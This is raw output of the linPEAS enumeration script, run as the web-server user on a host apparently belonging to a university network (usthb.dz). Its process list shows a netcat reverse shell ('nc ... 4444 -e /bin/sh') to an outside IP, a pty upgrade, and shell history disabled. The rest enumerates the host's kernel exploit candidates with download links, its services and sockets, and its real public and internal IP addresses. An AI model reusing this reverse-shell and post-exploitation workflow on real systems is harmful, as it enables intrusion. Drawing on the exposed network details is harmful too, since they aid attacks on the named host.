▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄             ▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄ ▄▄▄▄     ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄    ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄       ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄          ▄▄▄▄▄▄               ▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄              ▄▄▄▄▄▄▄▄                 ▄▄▄▄  ▄▄                  ▄▄▄ ▄▄▄▄▄                  ▄▄▄ ▄▄                ▄▄▄▄▄▄▄▄▄▄▄▄                  ▄▄ ▄            ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄   ▄▄ ▄      ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄                                ▄▄▄▄ ▄▄▄▄▄  ▄▄▄▄▄                       ▄▄▄▄▄▄     ▄▄▄▄ ▄▄▄▄   ▄▄▄▄▄                       ▄▄▄▄▄      ▄ ▄▄ ▄▄▄▄▄  ▄▄▄▄▄        ▄▄▄▄▄▄▄        ▄▄▄▄▄     ▄▄▄▄▄ ▄▄▄▄▄▄  ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄   ▄▄▄▄▄   ▄▄▄▄▄▄▄▄▄▄▄▄▄▄        ▄          ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄▄▄                       ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄                         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄            ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▀▀▄▄▄   ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀ ▀▀▀▄▄▄▄▄      ▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▀▀ ▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀ /---------------------------------------------------------------------------------\ | Do you like PEASS? | |---------------------------------------------------------------------------------| | Get the latest version : https://github.com/sponsors/carlospolop | | Follow on Twitter : @hacktricks_live | | Respect on HTB : SirBroccoli  | |---------------------------------------------------------------------------------| | Thank you!  | \---------------------------------------------------------------------------------/  linpeas-ng by carlospolop  ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.  Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist  LEGEND: RED/YELLOW: 95% a PE vector RED: You should take a look to it LightCyan: Users with console Blue: Users without console & mounted devs Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) LightMagenta: Your username Starting linpeas. Caching Writable Folders...  ╔═══════════════════╗ ═══════════════════════════════╣ Basic information ╠═══════════════════════════════  ╚═══════════════════╝ OS: Linux version 6.2.16-12-pve (build@proxmox) (gcc (Debian 12.2.0-14) 12.2.0, GNU ld (GNU Binutils for Debian) 2.40) #1 SMP PREEMPT_DYNAMIC PMX 6.2.16-12 (2023-09-04T13:21Z) User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data) Hostname: labbio Writable folder: /dev/shm Remember that you can use the '-t' option to call the Internet connectivity checks and automatic network recon! [+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h) [+] /bin/bash is available for network discovery, port scanning and port forwarding (linpeas can discover hosts, scan ports, and forward ports. Learn more with -h) [+] /bin/nc is available for network discovery & port scanning (linpeas can discover hosts and scan ports, learn more with -h)  Caching directories DONE   ╔════════════════════╗ ══════════════════════════════╣ System Information ╠══════════════════════════════  ╚════════════════════╝ ╔══════════╣ Operative system ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits Linux version 6.2.16-12-pve (build@proxmox) (gcc (Debian 12.2.0-14) 12.2.0, GNU ld (GNU Binutils for Debian) 2.40) #1 SMP PREEMPT_DYNAMIC PMX 6.2.16-12 (2023-09-04T13:21Z) Distributor ID: Debian Description: Debian GNU/Linux 11 (bullseye) Release: 11 Codename: bullseye ╔══════════╣ Sudo version sudo Not Found  ╔══════════╣ PATH ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin ╔══════════╣ Date & uptime Thu Feb 15 09:05:01 UTC 2024 09:05:01 up 2 days, 20:36, 0 users, load average: 1.05, 1.03, 0.55 ╔══════════╣ System stats Filesystem Size Used Avail Use% Mounted on /dev/loop4 20G 14G 4.9G 74% / none 492K 4.0K 488K 1% /dev tmpfs 24G 0 24G 0% /dev/shm tmpfs 9.5G 112K 9.5G 1% /run tmpfs 5.0M 0 5.0M 0% /run/lock total used free shared buff/cache available Mem: 5242880 740888 68392 133760 4433600 4501992 Swap: 5242880 1152 5241728 ╔══════════╣ CPU info Architecture: x86_64 CPU op-mode(s): 32-bit, 64-bit Byte Order: Little Endian Address sizes: 48 bits physical, 48 bits virtual CPU(s): 32 On-line CPU(s) list: 8,10 Off-line CPU(s) list: 0-7,9,11-31 Thread(s) per core: 0 Core(s) per socket: 8 Socket(s): 2 NUMA node(s): 4 Vendor ID: AuthenticAMD CPU family: 21 Model: 2 Model name: AMD Opteron(tm) Processor 6380 Stepping: 0 Frequency boost: enabled CPU MHz: 2778.072 CPU max MHz: 2500.0000 CPU min MHz: 1400.0000 BogoMIPS: 4999.59 Virtualization: AMD-V L1d cache: 256 KiB L1i cache: 512 KiB L2 cache: 16 MiB L3 cache: 12 MiB NUMA node0 CPU(s): 0-7 NUMA node1 CPU(s): 8-15 NUMA node2 CPU(s): 16-23 NUMA node3 CPU(s): 24-31 Vulnerability Gather data sampling: Not affected Vulnerability Itlb multihit: Not affected Vulnerability L1tf: Not affected Vulnerability Mds: Not affected Vulnerability Meltdown: Not affected Vulnerability Mmio stale data: Not affected Vulnerability Retbleed: Mitigation; untrained return thunk; SMT vulnerable Vulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl Vulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization Vulnerability Spectre v2: Mitigation; Retpolines, IBPB conditional, STIBP disabled, RSB filling, PBRSB-eIBRS Not affected Vulnerability Srbds: Not affected Vulnerability Tsx async abort: Not affected Flags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl nonstop_tsc cpuid extd_apicid amd_dcm aperfmperf pni pclmulqdq monitor ssse3 fma cx16 sse4_1 sse4_2 popcnt aes xsave avx f16c lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs xop skinit wdt fma4 tce nodeid_msr tbm topoext perfctr_core perfctr_nb cpb hw_pstate ssbd ibpb vmmcall bmi1 arat npt lbrv svm_lock nrip_save tsc_scale vmcb_clean flushbyasid decodeassists pausefilter pfthreshold ╔══════════╣ Any sd*/disk* disk in /dev? (limit 20)  ╔══════════╣ Unmounted file-system? ╚ Check if you can mount umounted devices  ╔══════════╣ Environment ╚ Any private information inside environment variables? HISTFILESIZE=0 SHLVL=1 OLDPWD=/srv/web LC_CTYPE=C.UTF-8 APACHE_RUN_DIR=/var/run/apache2 APACHE_PID_FILE=/var/run/apache2/apache2.pid JOURNAL_STREAM=8:77172 _=./lin.sh TERM=xterm-256color PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin INVOCATION_ID=2e25a25f81c644c88e6bd59e22eb388d APACHE_LOCK_DIR=/var/lock/apache2 LANG=C HISTSIZE=0 APACHE_RUN_GROUP=www-data APACHE_RUN_USER=www-data APACHE_LOG_DIR=/var/log/apache2 PWD=/srv/web/leve-drup HISTFILE=/dev/null ╔══════════╣ Searching Signature verification failed in dmesg ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#dmesg-signature-verification-failed dmesg Not Found  ╔══════════╣ Executing Linux Exploit Suggester ╚ https://github.com/mzet-/linux-exploit-suggester [+] [CVE-2022-2586] nft_object UAF Details: https://www.openwall.com/lists/oss-security/2022/08/29/5 Exposure: less probable Tags: ubuntu=(20.04){kernel:5.12.13} Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1 Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN) [+] [CVE-2021-22555] Netfilter heap out-of-bounds write Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html Exposure: less probable Tags: ubuntu=20.04{kernel:5.8.0-*} Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c Comments: ip_tables kernel module must be loaded ╔══════════╣ Executing Linux Exploit Suggester 2 ╚ https://github.com/jondonas/linux-exploit-suggester-2  ╔══════════╣ Protections ═╣ AppArmor enabled? .............. /etc/apparmor.d ═╣ AppArmor profile? .............. unconfined ═╣ is linuxONE? ................... s390x Not Found ═╣ grsecurity present? ............ grsecurity Not Found ═╣ PaX bins present? .............. PaX Not Found ═╣ Execshield enabled? ............ Execshield Not Found ═╣ SELinux enabled? ............... sestatus Not Found ═╣ Seccomp enabled? ............... enabled ═╣ User namespace? ................ enabled ═╣ Cgroup2 enabled? ............... enabled ═╣ Is ASLR enabled? ............... Yes ═╣ Printer? ....................... No ═╣ Is this a virtual machine? ..... No  ╔═══════════╗ ═══════════════════════════════════╣ Container ╠═══════════════════════════════════  ╚═══════════╝ ╔══════════╣ Container related tools present (if any): ╔══════════╣ Am I Containered? ╔══════════╣ Container details ═╣ Is this a container? ........... No ═╣ Any running containers? ........ No   ╔═══════╗ ═════════════════════════════════════╣ Cloud ╠═════════════════════════════════════  ╚═══════╝ ═╣ Google Cloud Platform? ............... No ═╣ AWS ECS? ............................. No ═╣ AWS EC2? ............................. No ═╣ AWS EC2 Beanstalk? ................... No ═╣ AWS Lambda? .......................... No ═╣ AWS Codebuild? ....................... No ═╣ DO Droplet? .......................... No ═╣ Aliyun ECS? .......................... No ═╣ IBM Cloud VM? ........................ No ═╣ Azure VM? ............................ No ═╣ Azure APP? ........................... No   ╔════════════════════════════════════════════════╗ ════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════  ╚════════════════════════════════════════════════╝ ╔══════════╣ Cleaned processes ╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes root 1 0.0 0.1 165540 9472 ? Ss Feb12 0:23 /sbin/init root 43 0.0 0.8 64760 42036 ? Ss Feb12 0:09 /lib/systemd/systemd-journald systemd+ 61 0.0 0.1 16072 7168 ? Ss Feb12 0:01 /lib/systemd/systemd-networkd └─(Caps) 0x0000000000003c00=cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw systemd+ 111 0.0 0.2 24132 12544 ? Ss Feb12 0:00 /lib/systemd/systemd-resolved root 114 0.0 0.0 3768 2048 ? Ss Feb12 0:00 /usr/sbin/cron -f message+ 115 0.0 0.0 8256 4352 ? Ss Feb12 0:07 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only └─(Caps) 0x0000000020000000=cap_audit_write root 116 0.0 0.0 220796 3840 ? Ssl Feb12 0:01 /usr/sbin/rsyslogd -n -iNONE root 117 0.0 0.1 13560 6400 ? Ss Feb12 0:02 /lib/systemd/systemd-logind root 142 0.0 0.5 249252 29440 ? Ss Feb12 0:32 php-fpm: master process (/etc/php/8.1/fpm/php-fpm.conf) www-data 21879 0.0 1.7 325044 90700 ? S 07:05 0:02 _ php-fpm: pool www www-data 22412 0.0 1.5 325200 79452 ? S 08:17 0:02 _ php-fpm: pool www www-data 22423 0.0 1.1 325036 58008 ? S 08:24 0:01 _ php-fpm: pool www root 144 0.0 0.4 106064 21248 ? Ssl Feb12 0:00 /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal root 145 0.0 0.0 2504 1792 pts/0 Ss+ Feb12 0:00 /sbin/agetty -o -p -- u --noclear --keep-baud console 115200,38400,9600 linux root 146 0.0 0.0 2504 1792 pts/1 Ss+ Feb12 0:00 /sbin/agetty -o -p -- u --noclear --keep-baud tty1 115200,38400,9600 linux root 147 0.0 0.0 2504 1536 pts/2 Ss+ Feb12 0:00 /sbin/agetty -o -p -- u --noclear --keep-baud tty2 115200,38400,9600 linux mysql 210 0.0 2.9 1545628 154892 ? Ssl Feb12 1:55 /usr/sbin/mariadbd root 218 0.0 0.6 253644 31896 ? Ss Feb12 0:29 /usr/sbin/apache2 -k start www-data 19514 0.0 0.1 81800 10156 ? S 00:00 0:01 _ /usr/sbin/apache2 -k start www-data 20659 0.0 0.3 254232 19940 ? S 03:53 0:00 _ /usr/sbin/apache2 -k start www-data 21525 0.0 0.3 254224 19784 ? S 06:12 0:00 _ /usr/sbin/apache2 -k start www-data 21528 0.0 0.3 254224 19784 ? S 06:12 0:00 _ /usr/sbin/apache2 -k start www-data 21540 0.0 0.3 254216 19784 ? S 06:13 0:00 _ /usr/sbin/apache2 -k start www-data 21542 0.0 0.3 254216 19528 ? S 06:13 0:00 _ /usr/sbin/apache2 -k start www-data 21543 0.0 0.3 254216 19784 ? S 06:13 0:00 _ /usr/sbin/apache2 -k start www-data 21544 0.0 0.3 254208 19528 ? S 06:13 0:00 _ /usr/sbin/apache2 -k start www-data 21725 0.0 0.0 2480 1536 ? S 06:39 0:00 | _ sh -c nc 172.111.140.76 4444 -e /bin/sh 2>&1 www-data 21726 0.0 0.0 2480 1280 ? S 06:39 0:00 | _ sh www-data 21731 0.0 0.1 12476 7936 ? S 06:40 0:01 | _ python3 -c import pty; pty.spawn("/bin/bash") www-data 21732 0.0 0.0 4528 3584 pts/3 Ss 06:40 0:00 | _ /bin/bash www-data 22630 0.1 0.0 4916 3588 pts/3 S+ 08:59 0:00 | _ /bin/sh ./lin.sh -a www-data 24868 0.0 0.0 4916 3056 pts/3 S+ 09:05 0:00 | _ /bin/sh ./lin.sh -a www-data 24870 0.0 0.0 7272 3072 pts/3 R+ 09:05 0:00 | | _ ps fauxwww www-data 24872 0.0 0.0 4916 2800 pts/3 S+ 09:05 0:00 | _ /bin/sh ./lin.sh -a www-data 21545 0.0 0.3 254216 20296 ? S 06:13 0:01 _ /usr/sbin/apache2 -k start www-data 21547 0.0 0.3 254216 19272 ? S 06:13 0:00 _ /usr/sbin/apache2 -k start www-data 21548 0.0 0.3 254224 19716 ? S 06:13 0:00 _ /usr/sbin/apache2 -k start www-data 22490 0.0 0.3 254200 16200 ? S 08:36 0:00 _ /usr/sbin/apache2 -k start root 1350 0.0 0.0 40048 4416 ? Ss Feb12 0:01 /usr/lib/postfix/sbin/master -w postfix 1352 0.0 0.1 40352 6400 ? S Feb12 0:00 _ qmgr -l -t unix -u postfix 22619 0.0 0.1 40304 6656 ? S 08:56 0:00 _ pickup -l -t unix -u -c ╔══════════╣ Binary processes permissions (non 'root root' and not belonging to current user) ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes  ╔══════════╣ Processes whose PPID belongs to a different user (not root) ╚ You will know if a user can somehow spawn processes as a different user Proc 61 with ppid 1 is run by user systemd-network but the ppid user is root Proc 111 with ppid 1 is run by user systemd-resolve but the ppid user is root Proc 115 with ppid 1 is run by user messagebus but the ppid user is root Proc 210 with ppid 1 is run by user mysql but the ppid user is root Proc 1352 with ppid 1350 is run by user postfix but the ppid user is root Proc 19514 with ppid 218 is run by user www-data but the ppid user is root Proc 20659 with ppid 218 is run by user www-data but the ppid user is root Proc 21525 with ppid 218 is run by user www-data but the ppid user is root Proc 21528 with ppid 218 is run by user www-data but the ppid user is root Proc 21540 with ppid 218 is run by user www-data but the ppid user is root Proc 21542 with ppid 218 is run by user www-data but the ppid user is root Proc 21543 with ppid 218 is run by user www-data but the ppid user is root Proc 21544 with ppid 218 is run by user www-data but the ppid user is root Proc 21545 with ppid 218 is run by user www-data but the ppid user is root Proc 21547 with ppid 218 is run by user www-data but the ppid user is root Proc 21548 with ppid 218 is run by user www-data but the ppid user is root Proc 21879 with ppid 142 is run by user www-data but the ppid user is root Proc 22412 with ppid 142 is run by user www-data but the ppid user is root Proc 22423 with ppid 142 is run by user www-data but the ppid user is root Proc 22490 with ppid 218 is run by user www-data but the ppid user is root Proc 22619 with ppid 1350 is run by user postfix but the ppid user is root ╔══════════╣ Files opened by processes belonging to other users ╚ This is usually empty because of the lack of privileges to read other user processes information COMMAND PID TID TASKCMD USER FD TYPE DEVICE SIZE/OFF NODE NAME ╔══════════╣ Processes with credentials in memory (root req) ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#credentials-from-process-memory gdm-password Not Found gnome-keyring-daemon Not Found lightdm Not Found vsftpd Not Found apache2 process found (dump creds from memory as root) sshd Not Found  ╔══════════╣ Different processes executed during 1 min (interesting is low number of repetitions) ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#frequent-cron-jobs  ╔══════════╣ Cron jobs ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs /usr/bin/crontab incrontab Not Found -rw-r--r-- 1 root root    1042 Jan  3  2023 /etc/crontab  /etc/cron.d: total 20 drwxr-xr-x  2 root root 4096 Jan 19  2023 . drwxr-xr-x 77 root root 4096 Feb 12 12:28 .. -rw-r--r--  1 root root  102 Feb 22  2021 .placeholder -rw-r--r--  1 root root  201 Jan  3  2023 e2scrub_all -rw-r--r--  1 root root  712 Dec 11  2022 php  /etc/cron.daily: total 32 drwxr-xr-x  2 root root 4096 Oct  8 06:40 . drwxr-xr-x 77 root root 4096 Feb 12 12:28 .. -rw-r--r--  1 root root  102 Feb 22  2021 .placeholder -rwxr-xr-x  1 root root  539 Jun  9  2022 apache2 -rwxr-xr-x  1 root root 1478 Jun 10  2021 apt-compat -rwxr-xr-x  1 root root 1298 Jan 30  2021 dpkg -rwxr-xr-x  1 root root  377 Feb 28  2021 logrotate -rwxr-xr-x  1 root root 1123 Feb 19  2021 man-db  /etc/cron.hourly: total 12 drwxr-xr-x  2 root root 4096 Aug 16  2021 . drwxr-xr-x 77 root root 4096 Feb 12 12:28 .. -rw-r--r--  1 root root  102 Feb 22  2021 .placeholder  /etc/cron.monthly: total 12 drwxr-xr-x  2 root root 4096 Aug 16  2021 . drwxr-xr-x 77 root root 4096 Feb 12 12:28 .. -rw-r--r--  1 root root  102 Feb 22  2021 .placeholder  /etc/cron.weekly: total 16 drwxr-xr-x  2 root root 4096 Aug 16  2021 . drwxr-xr-x 77 root root 4096 Feb 12 12:28 .. -rw-r--r--  1 root root  102 Feb 22  2021 .placeholder -rwxr-xr-x  1 root root  813 Feb 19  2021 man-db SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin 32 * * * * root cd / && run-parts --report /etc/cron.hourly 38 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 24 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 49 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) ╔══════════╣ Services ╚ Search for outdated versions  [ - ] apache-htcacheclean [ + ] apache2 [ + ] cron [ + ] dbus [ - ] hwclock.sh [ - ] kmod [ + ] mariadb [ - ] networking [ + ] php8.1-fpm [ + ] postfix [ + ] procps [ - ] rsync [ + ] rsyslog [ - ] ssh [ - ] udev [ + ] unattended-upgrades [ - ] urandom [ - ] x11-common ╔══════════╣ Systemd PATH ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#systemd-path-relative-paths PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin ╔══════════╣ Analyzing .service files ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services /etc/systemd/system/multi-user.target.wants/mariadb.service could be executing some relative path /lib/systemd/system/getty-static.service could be executing some relative path /lib/systemd/system/getty.target.wants/getty-static.service could be executing some relative path /lib/systemd/system/ifup@.service could be executing some relative path /lib/systemd/system/ifupdown-pre.service could be executing some relative path /lib/systemd/system/initrd-cleanup.service could be executing some relative path /lib/systemd/system/initrd-parse-etc.service could be executing some relative path /lib/systemd/system/initrd-switch-root.service could be executing some relative path /lib/systemd/system/initrd-udevadm-cleanup-db.service could be executing some relative path /lib/systemd/system/mariadb.service could be executing some relative path You can't write on systemd PATH ╔══════════╣ System timers ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers NEXT LEFT LAST PASSED UNIT ACTIVATES Thu 2024-02-15 09:09:00 UTC 1min 37s left Thu 2024-02-15 08:39:06 UTC 28min ago phpsessionclean.timer phpsessionclean.service Thu 2024-02-15 11:18:13 UTC 2h 10min left Wed 2024-02-14 20:17:58 UTC 12h ago apt-daily.timer apt-daily.service Thu 2024-02-15 12:43:57 UTC 3h 36min left Wed 2024-02-14 12:43:57 UTC 20h ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service Fri 2024-02-16 00:00:00 UTC 14h left Thu 2024-02-15 00:00:02 UTC 9h ago logrotate.timer logrotate.service Fri 2024-02-16 00:00:00 UTC 14h left Thu 2024-02-15 00:00:02 UTC 9h ago man-db.timer man-db.service Fri 2024-02-16 06:30:36 UTC 21h left Thu 2024-02-15 06:51:05 UTC 2h 16min ago apt-daily-upgrade.timer apt-daily-upgrade.service Sun 2024-02-18 03:10:43 UTC 2 days left Sun 2024-02-11 03:10:01 UTC 4 days ago e2scrub_all.timer e2scrub_all.service n/a n/a n/a n/a fstrim.timer fstrim.service ╔══════════╣ Analyzing .timer files ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers  ╔══════════╣ Analyzing .socket files ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets /lib/systemd/system/dbus.socket is calling this writable listener: /run/dbus/system_bus_socket /lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /run/dbus/system_bus_socket /lib/systemd/system/sockets.target.wants/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log /lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket /lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout /lib/systemd/system/syslog.socket is calling this writable listener: /run/systemd/journal/syslog /lib/systemd/system/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log /lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket /lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout ╔══════════╣ Unix Sockets Listening ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets  └─( - Can Connect) /anvil └─( - Can Connect) /bounce └─( - Can Connect) /bsmtp └─( - Can Connect) /cleanup └─( - Can Connect) /defer └─( - Can Connect) /discard └─( - Can Connect) /error └─( - Can Connect) /flush └─( - Can Connect) /ifmail └─( - Can Connect) /lmtp └─( - Can Connect) /local └─( - Can Connect) /maildrop └─( - Can Connect) /mailman └─( - Can Connect) /pickup └─( - Can Connect) /proxymap └─( - Can Connect) /proxywrite └─( - Can Connect) /qmgr └─( - Can Connect) /relay └─( - Can Connect) /retry └─( - Can Connect) /rewrite └─( - Can Connect) /run/dbus/system_bus_socket └─(Read Write - Can Connect) /run/mysqld/mysqld.sock └─(Read Write - Can Connect) /run/php/php8.1-fpm.sock └─(Read Write - Can Connect) /run/systemd/inaccessible/sock └─( - Cannot Connect) /run/systemd/io.system.ManagedOOM └─(Read Write - Can Connect) /run/systemd/journal/dev-log └─(Read Write - Can Connect) /run/systemd/journal/io.systemd.journal └─( - Cannot Connect) /run/systemd/journal/socket └─(Read Write - Can Connect) /run/systemd/journal/stdout └─(Read Write - Can Connect) /run/systemd/journal/syslog └─(Read Write - Can Connect) /run/systemd/notify └─(Read Write - Can Connect) /run/systemd/private └─(Read Write - Can Connect) /run/systemd/resolve/io.systemd.Resolve └─(Read Write - Can Connect) /run/systemd/userdb/io.systemd.DynamicUser └─(Read Write - Can Connect) /scache └─( - Can Connect) /scalemail-backend └─( - Can Connect) /showq └─( - Can Connect) /smtp └─( - Can Connect) /tlsmgr └─( - Can Connect) /trace └─( - Can Connect) /uucp └─( - Can Connect) /var/spool/postfix/dev/log └─(Read Write - Can Connect) /verify └─( - Can Connect) /virtual └─( - Can Connect) ╔══════════╣ D-Bus config files ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus  ╔══════════╣ D-Bus Service Objects list ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus NAME PID PROCESS USER CONNECTION UNIT SESSION DESCRIPTION :1.0 61 systemd-network systemd-network :1.0 systemd-networkd.service - - :1.1 117 systemd-logind root :1.1 systemd-logind.service - - :1.2 1 systemd root :1.2 init.scope - - :1.3 111 systemd-resolve systemd-resolve :1.3 systemd-resolved.service - - :1.4 144 unattended-upgr root :1.4 unattended-upgrades.service - - :1.80 30345 busctl www-data :1.80 apache2.service - - com.ubuntu.SoftwareProperties - - - (activatable) - - - org.freedesktop.DBus 1 systemd root - init.scope - - org.freedesktop.PackageKit - - - (activatable) - - - org.freedesktop.PolicyKit1 - - - (activatable) - - - org.freedesktop.hostname1 - - - (activatable) - - - org.freedesktop.locale1 - - - (activatable) - - - org.freedesktop.login1 117 systemd-logind root :1.1 systemd-logind.service - - org.freedesktop.network1 61 systemd-network systemd-network :1.0 systemd-networkd.service - - org.freedesktop.resolve1 111 systemd-resolve systemd-resolve :1.3 systemd-resolved.service - - org.freedesktop.systemd1 1 systemd root :1.2 init.scope - - org.freedesktop.timedate1 - - - (activatable) - - - org.freedesktop.timesync1 - - - (activatable) - - -  ╔═════════════════════╗ ══════════════════════════════╣ Network Information ╠══════════════════════════════  ╚═════════════════════╝ ╔══════════╣ Hostname, hosts and DNS labbio 127.0.0.1 localhost ::1 localhost ip6-localhost ip6-loopback ff02::1 ip6-allnodes ff02::2 ip6-allrouters 193.194.89.177 labbio.usthb.dz labbio search usthb.dz nameserver 193.194.89.29 nameserver 193.194.89.50 nameserver 193.194.89.2 usthb.dz ╔══════════╣ Content of /etc/inetd.conf & /etc/xinetd.conf /etc/inetd.conf Not Found  ╔══════════╣ Interfaces default 0.0.0.0 loopback 127.0.0.0 link-local 169.254.0.0 1: lo: mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: eth0@if28: mtu 1500 qdisc noqueue state UP group default qlen 1000 link/ether ea:e9:a0:28:74:2c brd ff:ff:ff:ff:ff:ff link-netnsid 0 inet 193.194.89.177/24 brd 193.194.89.255 scope global eth0 valid_lft forever preferred_lft forever inet6 fe80::e8e9:a0ff:fe28:742c/64 scope link valid_lft forever preferred_lft forever 3: eth1@if32: mtu 1500 qdisc noqueue state UP group default qlen 1000 link/ether ae:48:8c:8a:09:59 brd ff:ff:ff:ff:ff:ff link-netnsid 0 inet 192.168.16.56/24 brd 192.168.16.255 scope global eth1 valid_lft forever preferred_lft forever inet6 fe80::ac48:8cff:fe8a:959/64 scope link valid_lft forever preferred_lft forever ╔══════════╣ Networks and neighbours 193.194.89.50 dev eth0 FAILED 193.194.89.2 dev eth0 FAILED 193.194.89.11 dev eth0 lladdr 00:22:4d:69:d4:2c STALE 193.194.89.1 dev eth1 lladdr 90:6c:ac:3e:6f:97 STALE 193.194.89.171 dev eth0 lladdr 16:e7:0e:30:0c:06 STALE 193.194.89.11 dev eth1 lladdr 00:22:4d:69:d4:2c STALE 193.194.89.1 dev eth0 lladdr 90:6c:ac:3e:6f:97 REACHABLE 193.194.89.29 dev eth0 FAILED fe80::3809:4659:79db:22cb dev eth0 lladdr 00:22:4d:69:d4:2c STALE fe80::3809:4659:79db:22cb dev eth1 lladdr 00:22:4d:69:d4:2c STALE IP address HW type Flags HW address Mask Device 193.194.89.50 0x1 0x0 00:00:00:00:00:00 * eth0 193.194.89.2 0x1 0x0 00:00:00:00:00:00 * eth0 193.194.89.11 0x1 0x2 00:22:4d:69:d4:2c * eth0 193.194.89.1 0x1 0x2 90:6c:ac:3e:6f:97 * eth1 193.194.89.171 0x1 0x2 16:e7:0e:30:0c:06 * eth0 193.194.89.11 0x1 0x2 00:22:4d:69:d4:2c * eth1 193.194.89.1 0x1 0x2 90:6c:ac:3e:6f:97 * eth0 193.194.89.29 0x1 0x0 00:00:00:00:00:00 * eth0 